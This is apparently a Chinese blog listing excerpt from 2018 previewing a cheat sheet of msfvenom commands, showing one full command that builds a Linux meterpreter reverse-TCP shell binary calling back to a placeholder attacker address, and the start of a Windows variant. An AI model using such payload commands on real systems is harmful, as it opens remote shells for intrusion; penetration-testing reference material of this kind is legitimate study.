摘要: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w 阅读全文
posted @ 2018-12-25 08:08 天淋淋 阅读(5127) 评论(0) 推荐(0) 编辑